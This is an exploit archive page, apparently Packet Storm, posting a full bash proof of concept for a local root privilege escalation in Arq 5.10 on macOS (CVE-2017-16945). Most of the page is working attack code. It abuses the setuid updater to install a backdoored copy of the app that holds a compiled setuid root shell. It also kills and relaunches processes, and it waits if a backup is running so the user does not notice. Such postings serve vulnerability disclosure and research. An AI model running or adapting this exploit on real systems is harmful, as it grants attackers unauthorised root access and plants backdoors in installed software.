what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Arq 5.10 Local Privilege Escalation

Arq 5.10 Local Privilege Escalation
Posted Jan 29, 2018
Authored by Mark Wadham

Arq version 5.10 suffers from a local privilege escalation vulnerability. Proof of concept 2 of 2.

tags | exploit, local, proof of concept
advisories | CVE-2017-16945
SHA-256 | d6e8065acf10afa34812344b7aeadb464a28dc414bdfe402a6e69d6c3e1f9e69

Arq 5.10 Local Privilege Escalation

Change Mirror Download
#!/bin/bash

#################################################################
###### Arq <= 5.10 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html ######
#################################################################

app="/Applications/Arq.app"
res="$app/Contents/Resources"
lires="$app/Contents/Library/LoginItems/Arq Agent.app/Contents/Resources"

vuln=`ls -la "$lires/arq_updater" |grep '\-rws' |grep root`

if [ "$vuln" == "" ] ; then
echo "Not vulnerable - auto-updates not enabled."
exit 1
fi

if [ "$1" != "-f" ] ; then
latest_logfile="`ls -1t ~/Library/Logs/Arq\ Agent/ |head -n1`"
status_line="`egrep -i 'backup session.*?(ended|started)' \
\"$HOME/Library/Logs/Arq Agent/$latest_logfile\" |tail -n1 |grep -i started`"

if [ "$status_line" != "" ] ; then
echo -n "WARNING: backup in progress, the user will very "
echo "likely notice if we exploit now!"
echo "use -f to override."
exit 1
fi
fi

owd="`pwd`"

if [ -e ~/.arq_510_privesc_exp ] ; then
rm -rf ~/.arq_510_privesc_exp
fi

mkdir ~/.arq_510_privesc_exp
cd ~/.arq_510_privesc_exp

echo "copying application..."

cp -R /Applications/Arq.app .

echo "compiling payloads..."

cat > payload.sh <<EOF
#!/bin/bash
rm -rf $HOME/.arq_510_privesc_exp
while :
do
pid=\`ps auxwww |grep '$app/Contents/MacOS/Arq' |grep -v grep |xargs \
|cut -d ' ' -f2\`
if [ "\$pid" != "" ] ; then
kill -9 \$pid
open $app/Contents/Library/LoginItems/Arq\ Agent.app
exit 0
fi
done
EOF
chmod 755 payload.sh

au_relative=`echo "$lires/standardrestorer" |sed 's/^\/Applications\///'`

cat > shell.c <<EOF
#include <unistd.h>
#include <string.h>
int main(int ac, char *av[])
{
if (ac > 1 && strcmp(av[1], "boom") == 0) {
setuid(0);
setgid(0);
execl(
"/bin/bash","bash","-c","mv -f $res/standardrestorer.orig $res/standardr"
"estorer;chmod 4755 $res/standardrestorer;$HOME/.arq_510_privesc_exp/pay"
"load.sh;/bin/bash", NULL
);
}
return 0;
}
EOF
mv Arq.app/Contents/Resources/standardrestorer \
Arq.app/Contents/Resources/standardrestorer.orig
gcc -o Arq.app/Contents/Resources/standardrestorer shell.c
rm -f shell.c

payload_size=`stat Arq.app/Contents/Resources/standardrestorer |cut -d ' ' -f8`
GID=`id |sed 's/^.*gid=//' |cut -d '(' -f1`
cwd=`pwd`

echo "creating backdoored Arq.zip..."
zip -1r Arq.zip Arq.app/ 1>/dev/null 2>/dev/null
rm -rf Arq.app/

echo "executing upgrade..."

"$lires/arq_updater" installupdate file://$cwd/Arq.zip $UID $GID YES \
1>/dev/null 2>/dev/null

echo "waiting..."
while :
do
ac_size=`stat $res/standardrestorer 2>/dev/null |cut -d ' ' -f8`
x=`ls -la $res/standardrestorer |grep -- '-rwsr-xr-x' |grep root`

if [ "$ac_size" == "$payload_size" -a "$x" != "" ] ; then
cd "$owd"
$res/standardrestorer boom
exit 0
fi
sleep 0.2
done

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close